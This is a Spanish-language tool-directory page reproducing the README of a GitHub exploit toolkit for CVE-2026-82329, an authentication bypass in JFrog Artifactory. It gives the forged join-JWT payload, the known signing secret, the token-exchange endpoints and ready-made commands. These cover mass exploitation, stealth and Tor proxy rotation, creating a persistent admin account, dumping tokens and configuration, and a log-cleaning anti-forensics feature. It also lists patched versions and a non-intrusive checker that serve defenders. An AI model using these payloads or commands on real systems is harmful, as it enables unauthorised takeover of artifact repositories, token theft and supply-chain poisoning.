Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-82329-PoC-Exploit — Kit de herramientas de explotación y detección para CVE-2026-82329, un bypass de autenticación de JFrog Artifactory. Falsifica JWTs de tipo join para acuñar tokens de administrador; incluye un verificador de versión no intrusivo. | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
Herramientas DefensivasEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónVirtualización de SeguridadPruebas de PenetraciónAutenticación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Red Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

Kit de herramientas de explotación y detección para CVE-2026-82329, un bypass de autenticación de JFrog Artifactory. Falsifica JWTs de tipo join para acuñar tokens de administrador; incluye un verificador de versión no intrusivo.

Ver Repositorio
hace 10h 35mAún no revisado
Compartir

CVEPoC

CVE‑2026‑82329 – Toolkit de elusión de autenticación de JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

SOLO USO ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas únicamente para profesionales de seguridad autorizados, equipos defensivos y testers de penetración.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Computer Misuse Act (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.


📖 Descripción general de la vulnerabilidad

CVE‑2026‑82329 es una vulnerabilidad crítica de elusión de autenticación en JFrog Artifactory autoalojado (versiones 7.111.x a 7.161.x) que permite a un atacante no autenticado obtener un token de administrador completo de la plataforma abusando del mecanismo de unión al clúster de JFrog Access.

Cómo funciona

  1. Confianza en clave de unión en blanco – JFrog Access confía en una clave de unión fantasma cuyo valor es una cadena vacía. Su secreto de firma es, por tanto, el valor determinista 32 * 0x20 (espacios).
  2. JWT de unión falsificado – un atacante falsifica un JWT HS256 firmado con este secreto conocido y kid = SHA256("").
  3. Token SERVICE emitido – POST /access/api/v1/registry/join devuelve un token SERVICE con scp=admin sin ninguna autenticación.
  4. Intercambio de token de administrador – POST /access/api/v1/tokens con scope=applied-permissions/admin&audience=* produce un token de administrador completo de la plataforma.
  5. Impacto – toma de control total del repositorio, robo de tokens, creación de usuarios administradores, envenenamiento de artefactos, ataques a la cadena de suministro y movimiento lateral hacia servicios conectados (Xray, Mission Control, Distribution). ¡Actualice inmediatamente!

Versiones afectadas

  • 7.111.4 – 7.111.20 – vulnerable
  • 7.117.0 – 7.117.27 – vulnerable
  • 7.125.0 – 7.125.19 – vulnerable
  • 7.133.0 – 7.133.28 – vulnerable
  • 7.146.0 – 7.146.36 – vulnerable
  • 7.161.0 – 7.161.19 – vulnerable

Parche

  • Actualice a 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38 o 7.161.20 o posterior.
  • Si la actualización no es posible, restrinja el acceso de red a Artifactory (nunca lo exponga a Internet) y rote todos los tokens de administrador como solución temporal.

🧰 Herramientas

HerramientaPropósitoUsuario previsto
exploit.pyToolkit completo weaponizado con falsificación de JWT, intercambio de token de administrador, creación de usuarios administradores, escaneo masivo, modo sigiloso, rotación de proxies, menú interactivo y cadena de ataque completa.Equipos rojos / pentesters autorizados
safechecker.pyComprobador de vulnerabilidad no intrusivo que detecta la versión de Artifactory, valida la exposición y evalúa el riesgo sin obtener ningún token ni ejecutar ninguna carga útil. Genera informes JSON.Equipos azules / auditores de seguridad

📊 Comparación de características

Característicaexploit.pysafechecker.py
Detección de vulnerabilidad✅✅
Detección de versión✅✅
JWT de unión falsificado✅❌
Emisión de token de servicio✅❌
Intercambio de token de administrador✅❌
Creación de usuario administrador✅❌
Listar repositorios✅❌
Listar usuarios✅❌
Volcar configuración✅❌
Volcar tokens✅❌
Cadena de ataque completa✅❌
Menú interactivo✅❌
Escaneo masivo (multihilo)✅✅
Soporte de proxy✅✅
Rotación de proxies✅❌
Soporte de Tor (anonimato)✅❌
Rotación de User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Limitador de tasa adaptativo✅❌
Modo no intrusivo (seguro)❌✅
Informe de versión✅✅
Comprobación de acceso anónimo❌✅
Informe JSON

🎯 Resumen de casos de uso

EscenarioHerramienta recomendada
Equipo Azul – verificar si su Artifactory es vulnerablesafechecker.py
Auditoría de seguridad – evaluación de vulnerabilidad no intrusivasafechecker.py
Equipo Rojo – pruebas de penetración autorizadas con explotación completaexploit.py
Bug Bounty – pruebas de divulgación responsablesafechecker.py
Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidadexploit.py (solo detección)
Respuesta a incidentes – comprobar si los sistemas están comprometidossafechecker.py

⚙️ Instalación

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 Parámetros

Parámetros de exploit.py

ParámetroDescripción
-u, --urlURL de un único objetivo Artifactory (p. ej. http://artifactory.example.com:8082)
-f, --fileArchivo que contiene la lista de objetivos (uno por línea) para escaneo masivo
--create-adminCrear usuario administrador persistente (formato: USER:PASS)
--keep-adminMantener el usuario administrador creado (no limpiar después del escaneo)
--token-onlySolo imprimir el token de administrador (objetivo único)
--interactiveMenú interactivo después de la explotación
--service-idID de servicio para el JWT de unión (predeterminado: jfrt@01)
-t, --threadsNúmero de hilos para múltiples objetivos (predeterminado: 10)
--timeoutTiempo de espera de solicitud (predeterminado: 25s)
--retryReintentos máximos (predeterminado: 3)
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
--proxy-listArchivo con proxies para rotación (uno por línea)
--jitterJitter aleatorio (0‑2 seg) entre solicitudes
--stealthHabilitar modo sigiloso (rotación de UA + X‑Forwarded‑For)
--curl-cffiUsar curl_cffi para suplantación de huella TLS
--fullAtaque completo: todos los módulos
--dump-configVolcar configuración del sistema
--dump-tokensVolcar todos los tokens de acceso
--list-reposListar repositorios
--list-usersListar usuarios

Parámetros de safechecker.py

ParámetroDescripción
-u, --urlURL de un único objetivo Artifactory (p. ej. http://artifactory.example.com:8082)
-f, --fileArchivo que contiene la lista de objetivos (uno por línea)
-t, --threadsNúmero de hilos para múltiples objetivos (predeterminado: 5)
--timeoutTiempo de espera de solicitud (predeterminado: 10s)
-v, --verboseSalida detallada
-o, --outputGuardar informe JSON en archivo

💥 Escenarios

#EscenarioComando
1Comprobación rápida de vulnerabilidadpython safechecker.py -u http://artifactory.example.com:8082
2Escaneo detallado con informepython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3Auditoría masiva desde archivopython safechecker.py -f targets.txt -t 10 -o audit.json
4Exploit solo detecciónpython exploit.py -u http://artifactory.example.com:8082 --detect
5Obtener solo token de administradorpython exploit.py -u http://artifactory.example.com:8082 --token-only
6Ataque completo con menú interactivopython exploit.py -u http://artifactory.example.com:8082 --interactive
7Crear usuario administrador persistentepython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8Volcar configuraciónpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9Listar repositorios y usuariospython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10Exploit masivo con sigilopython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Rotación de proxies con Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 Endpoint y cadena de explotación

El exploit utiliza los siguientes endpoints de JFrog y pasos de explotación:

PasoMétodoEndpointDescripción
1. UniónPOST/access/api/v1/registry/joinJWT HS256 falsificado → token SERVICE (scp=admin)
2. IntercambioPOST/access/api/v1/tokensToken SERVICE → token de administrador de plataforma
3. PruebaGET/artifactory/api/system/configurationPrueba de acceso solo para administradores
4. PersistenciaPUT/artifactory/api/security/users/{user}Crear usuario administrador persistente
5. RevocaciónDELETE/access/api/v1/tokens/{id}Limpiar tokens creados

Formato de carga útil

root@kitploit:~
# Forged join JWT structure
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Signing secret
secret = b"\x20" * 32

# Admin token request
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ Uso responsable

  • Utilice estas herramientas únicamente en sistemas que posea o para los que tenga permiso escrito explícito de probar.
  • El acceso no autorizado es ilegal y poco ético.
  • Los autores no son responsables de ningún uso indebido.
  • Siga siempre las leyes y regulaciones de su país.

Este software se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.

Descargar herramienta
✅
✅
Limpieza de registros (antiforense)✅❌
User‑Agent personalizado✅✅
Control de verificación SSL✅✅
--detectSolo detección (sin intercambio de token de administrador)
--exploitRealizar explotación completa
-o, --outputGuardar informe JSON en archivo
-v, --verboseSalida detallada
-q, --quietModo silencioso